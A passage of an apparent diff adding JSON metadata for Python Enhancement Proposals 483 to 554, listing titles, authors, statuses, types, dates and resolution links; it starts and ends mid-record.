"created": "19-Dec-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0483/" + }, + "484": { + "number": 484, + "title": "Type Hints", + "authors": "Guido van Rossum, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-Sep-2014", + "python_version": "3.5", + "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0484/" + }, + "485": { + "number": 485, + "title": "A Function for testing approximate equality", + "authors": "Christopher Barker", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2015", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138598.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0485/" + }, + "486": { + "number": 486, + "title": "Make the Python Launcher aware of virtual environments", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Feb-2015", + "python_version": "3.5", + "post_history": "12-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138579.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0486/" + }, + "487": { + "number": 487, + "title": "Simpler customisation of class creation", + "authors": "Martin Teichmann", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Feb-2015", + "python_version": "3.6", + "post_history": "27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145629.html", + "requires": null, + "replaces": "422", + "superseded_by": null, + "url": "https://peps.python.org/pep-0487/" + }, + "488": { + "number": 488, + "title": "Elimination of PYO files", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2015", + "python_version": "3.5", + "post_history": "06-Mar-2015, 13-Mar-2015, 20-Mar-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0488/" + }, + "489": { + "number": 489, + "title": "Multi-phase extension module initialization", + "authors": "Petr Viktorin, Stefan Behnel, Alyssa Coghlan", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2013", + "python_version": "3.5", + "post_history": "23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140108.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0489/" + }, + "490": { + "number": 490, + "title": "Chain exceptions at C level", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Mar-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0490/" + }, + "491": { + "number": 491, + "title": "The Wheel Binary Package Format 1.9", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Apr-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0491/" + }, + "492": { + "number": 492, + "title": "Coroutines with async and await syntax", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Apr-2015", + "python_version": "3.5", + "post_history": "17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0492/" + }, + "493": { + "number": 493, + "title": "HTTPS verification migration tools for Python 2.7", + "authors": "Alyssa Coghlan, Robert Kuska, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2015", + "python_version": "2.7.12", + "post_history": "06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-March/143450.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0493/" + }, + "494": { + "number": 494, + "title": "Python 3.6 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-May-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0494/" + }, + "495": { + "number": 495, + "title": "Local Time Disambiguation", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-September/000900.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0495/" + }, + "496": { + "number": 496, + "title": "Environment Markers", + "authors": "James Polley", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "packaging", + "created": "03-Jul-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0496/" + }, + "497": { + "number": 497, + "title": "A standard mechanism for backward compatibility", + "authors": "Ed Schofield", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "04-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0497/" + }, + "498": { + "number": 498, + "title": "Literal String Interpolation", + "authors": "Eric V. Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2015", + "python_version": "3.6", + "post_history": "07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-September/141526.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0498/" + }, + "499": { + "number": 499, + "title": "``python -m foo`` should also bind ``'foo'`` in ``sys.modules``", + "authors": "Cameron Simpson, Chris Angelico, Joseph Jevnik", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "07-Aug-2015", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0499/" + }, + "500": { + "number": 500, + "title": "A protocol for delegating datetime methods to their tzinfo implementations", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-August/000354.html", + "requires": "495", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0500/" + }, + "501": { + "number": 501, + "title": "General purpose template literal strings", + "authors": "Alyssa Coghlan, Nick Humrich", + "discussions_to": "https://discuss.python.org/t/pep-501-reopen-general-purpose-string-template-literals/24625", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": "3.12", + "post_history": "`08-Aug-2015 `__, `05-Sep-2015 `__, `09-Mar-2023 `__,", + "resolution": null, + "requires": "701", + "replaces": null, + "superseded_by": "750", + "url": "https://peps.python.org/pep-0501/" + }, + "502": { + "number": 502, + "title": "String Interpolation - Extended Discussion", + "authors": "Mike G. Miller", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "10-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0502/" + }, + "503": { + "number": 503, + "title": "Simple Repository API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "04-Sep-2015", + "python_version": null, + "post_history": "04-Sep-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026899.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0503/" + }, + "504": { + "number": 504, + "title": "Using the System RNG by default", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "15-Sep-2015", + "python_version": "3.6", + "post_history": "15-Sep-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0504/" + }, + "505": { + "number": 505, + "title": "None-aware operators", + "authors": "Mark E. Haase, Steve Dower", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Sep-2015", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0505/" + }, + "506": { + "number": 506, + "title": "Adding A Secrets Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Sep-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0506/" + }, + "507": { + "number": 507, + "title": "Migrate CPython to Git and GitLab", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "30-Sep-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/core-workflow/2016-January/000345.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0507/" + }, + "508": { + "number": 508, + "title": "Dependency specification for Python Software Packages", + "authors": "Robert Collins", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2015", + "python_version": null, + "post_history": "05-Nov-2015, 16-Nov-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-November/027868.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0508/" + }, + "509": { + "number": 509, + "title": "Add a private version to dict", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": "`08-Jan-2016 `__, `11-Jan-2016 `__, `14-Apr-2016 `__, `19-Apr-2016 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/QFVJV6YQOUSWIYY4FBORY647YCBSCIMQ/", + "requires": null, + "replaces": null, + "superseded_by": "699", + "url": "https://peps.python.org/pep-0509/" + }, + "510": { + "number": 510, + "title": "Specialize functions with guards", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0510/" + }, + "511": { + "number": 511, + "title": "API for code transformers", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Jan-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0511/" + }, + "512": { + "number": 512, + "title": "Migrating from hg.python.org to GitHub", + "authors": "Brett Cannon", + "discussions_to": "core-workflow@python.org", + "status": "Final", + "type": "Process", + "topic": "", + "created": "17-Jan-2015", + "python_version": null, + "post_history": "17-Jan-2016, 19-Jan-2016, 23-Jan-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0512/" + }, + "513": { + "number": 513, + "title": "A Platform Tag for Portable Linux Built Distributions", + "authors": "Robert T. McGibbon, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "19-Jan-2016", + "python_version": null, + "post_history": "19-Jan-2016, 25-Jan-2016, 29-Jan-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-January/028211.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0513/" + }, + "514": { + "number": 514, + "title": "Python registration in the Windows registry", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "02-Feb-2016", + "python_version": null, + "post_history": "02-Feb-2016, 01-Mar-2016, 18-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145697.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0514/" + }, + "515": { + "number": 515, + "title": "Underscores in Numeric Literals", + "authors": "Georg Brandl, Serhiy Storchaka", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2016", + "python_version": "3.6", + "post_history": "10-Feb-2016, 11-Feb-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0515/" + }, + "516": { + "number": 516, + "title": "Build system abstraction for pip/conda etc", + "authors": "Robert Collins, Nathaniel J. Smith", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "26-Oct-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-May/030517.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0516/" + }, + "517": { + "number": 517, + "title": "A build-system independent format for source trees", + "authors": "Nathaniel J. Smith, Thomas Kluyver", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Sep-2015", + "python_version": null, + "post_history": "01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2017-September/031548.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0517/" + }, + "518": { + "number": 518, + "title": "Specifying Minimum Build System Requirements for Python Projects", + "authors": "Brett Cannon, Nathaniel J. Smith, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2016", + "python_version": null, + "post_history": "10-May-2016, 11-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-May/028969.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0518/" + }, + "519": { + "number": 519, + "title": "Adding a file system path protocol", + "authors": "Brett Cannon, Koos Zevenhoven", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-May-2016", + "python_version": "3.6", + "post_history": "11-May-2016, 12-May-2016, 13-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-May/144646.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0519/" + }, + "520": { + "number": 520, + "title": "Preserving Class Attribute Definition Order", + "authors": "Eric Snow", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Jun-2016", + "python_version": "3.6", + "post_history": "07-Jun-2016, 11-Jun-2016, 20-Jun-2016, 24-Jun-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-June/145442.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0520/" + }, + "521": { + "number": 521, + "title": "Managing global context via 'with' blocks in generators and coroutines", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2015", + "python_version": "3.6", + "post_history": "29-Apr-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0521/" + }, + "522": { + "number": 522, + "title": "Allow BlockingIOError in security sensitive APIs", + "authors": "Alyssa Coghlan, Nathaniel J. Smith", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/security-sig/2016-August/000101.html", + "requires": "506", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0522/" + }, + "523": { + "number": 523, + "title": "Adding a frame evaluation API to CPython", + "authors": "Brett Cannon, Dino Viehland", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-May-2016", + "python_version": "3.6", + "post_history": "16-May-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-August/145937.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0523/" + }, + "524": { + "number": 524, + "title": "Make os.urandom() blocking on Linux", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jun-2016", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0524/" + }, + "525": { + "number": 525, + "title": "Asynchronous Generators", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jul-2016", + "python_version": "3.6", + "post_history": "02-Aug-2016, 23-Aug-2016, 01-Sep-2016, 06-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0525/" + }, + "526": { + "number": 526, + "title": "Syntax for Variable Annotations", + "authors": "Ryan Gonzalez, Philip House, Ivan Levkivskyi, Lisa Roach, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "09-Aug-2016", + "python_version": "3.6", + "post_history": "30-Aug-2016, 02-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146282.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0526/" + }, + "527": { + "number": 527, + "title": "Removing Un(der)used file types/extensions on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "23-Aug-2016", + "python_version": null, + "post_history": "23-Aug-2016", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2016-September/029624.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0527/" + }, + "528": { + "number": 528, + "title": "Change Windows console encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146278.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0528/" + }, + "529": { + "number": 529, + "title": "Change Windows filesystem encoding to UTF-8", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Aug-2016", + "python_version": "3.6", + "post_history": "01-Sep-2016, 04-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146277.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0529/" + }, + "530": { + "number": 530, + "title": "Asynchronous Comprehensions", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2016", + "python_version": "3.6", + "post_history": "03-Sep-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0530/" + }, + "531": { + "number": 531, + "title": "Existence checking operators", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2016", + "python_version": "3.7", + "post_history": "28-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0531/" + }, + "532": { + "number": 532, + "title": "A circuit breaking protocol and binary operators", + "authors": "Alyssa Coghlan, Mark E. Haase", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Oct-2016", + "python_version": "3.8", + "post_history": "05-Nov-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0532/" + }, + "533": { + "number": 533, + "title": "Deterministic cleanup for iterators", + "authors": "Nathaniel J. Smith", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "18-Oct-2016", + "python_version": null, + "post_history": "18-Oct-2016", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0533/" + }, + "534": { + "number": 534, + "title": "Improved Errors for Missing Standard Library Modules", + "authors": "Tom\u00e1\u0161 Orsava, Petr Viktorin, Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2016", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0534/" + }, + "535": { + "number": 535, + "title": "Rich comparison chaining", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Nov-2016", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": "532", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0535/" + }, + "536": { + "number": 536, + "title": "Final Grammar for Literal String Interpolation", + "authors": "Philipp Angerer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Dec-2016", + "python_version": "3.7", + "post_history": "`18-Aug-2016 `__, `23-Dec-2016 `__, `15-Mar-2019 `__", + "resolution": "https://discuss.python.org/t/pep-536-should-be-marked-as-rejected/35226/4", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0536/" + }, + "537": { + "number": 537, + "title": "Python 3.7 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "23-Dec-2016", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0537/" + }, + "538": { + "number": 538, + "title": "Coercing the legacy C locale to a UTF-8 based locale", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2016", + "python_version": "3.7", + "post_history": "03-Jan-2017, 07-Jan-2017, 05-Mar-2017, 09-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/148035.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0538/" + }, + "539": { + "number": 539, + "title": "A New C-API for Thread-Local Storage in CPython", + "authors": "Erik M. Bray, Masayuki Yamamoto", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2016", + "python_version": "3.7", + "post_history": "16-Dec-2016, 31-Aug-2017, 08-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149358.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0539/" + }, + "540": { + "number": 540, + "title": "Add a new UTF-8 Mode", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jan-2016", + "python_version": "3.7", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-December/151173.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0540/" + }, + "541": { + "number": 541, + "title": "Package Index Name Retention", + "authors": "\u0141ukasz Langa", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-Jan-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-March/032089.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0541/" + }, + "542": { + "number": 542, + "title": "Dot Notation Assignment In Function Header", + "authors": "Markus Meskanen", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156695.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0542/" + }, + "543": { + "number": 543, + "title": "A Unified TLS API for Python", + "authors": "Cory Benfield, Christian Heimes", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "17-Oct-2016", + "python_version": "3.7", + "post_history": "11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "748", + "url": "https://peps.python.org/pep-0543/" + }, + "544": { + "number": 544, + "title": "Protocols: Structural subtyping (static duck typing)", + "authors": "Ivan Levkivskyi, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "05-Mar-2017", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0544/" + }, + "545": { + "number": 545, + "title": "Python Documentation Translations", + "authors": "Julien Palard, Inada Naoki, Victor Stinner", + "discussions_to": null, + "status": "Active", + "type": "Process", + "topic": "governance", + "created": "04-Mar-2017", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2017-May/147957.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0545/" + }, + "546": { + "number": 546, + "title": "Backport ssl.MemoryBIO and ssl.SSLObject to Python 2.7", + "authors": "Victor Stinner, Cory Benfield", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-May-2017", + "python_version": "2.7", + "post_history": "23-May-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-June/148301.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0546/" + }, + "547": { + "number": 547, + "title": "Running extension modules using the -m option", + "authors": "Marcel Plch, Petr Viktorin", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "25-May-2017", + "python_version": "3.7", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0547/" + }, + "548": { + "number": 548, + "title": "More Flexible Loop Control", + "authors": "R David Murray", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0548/" + }, + "549": { + "number": 549, + "title": "Instance Descriptors", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "04-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0549/" + }, + "550": { + "number": 550, + "title": "Execution Context", + "authors": "Yury Selivanov, Elvis Pranskevichus", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2017", + "python_version": "3.7", + "post_history": "11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017, 01-Sep-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0550/" + }, + "551": { + "number": 551, + "title": "Security transparency in the Python runtime", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "23-Aug-2017", + "python_version": "3.7", + "post_history": "24-Aug-2017, 28-Aug-2017", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0551/" + }, + "552": { + "number": 552, + "title": "Deterministic pycs", + "authors": "Benjamin Peterson", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Sep-2017", + "python_version": "3.7", + "post_history": "07-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-September/149649.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0552/" + }, + "553": { + "number": 553, + "title": "Built-in breakpoint()", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Sep-2017", + "python_version": "3.7", + "post_history": "05-Sep-2017, 07-Sep-2017, 13-Sep-2017", + "resolution": "https://mail.python.org/pipermail/python-dev/2017-October/149705.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0553/" + }, + "554": { + "number": 554, + "title": "Multiple Interpreters in the Stdlib", + "authors": "Eric Snow", + "discussions_to": 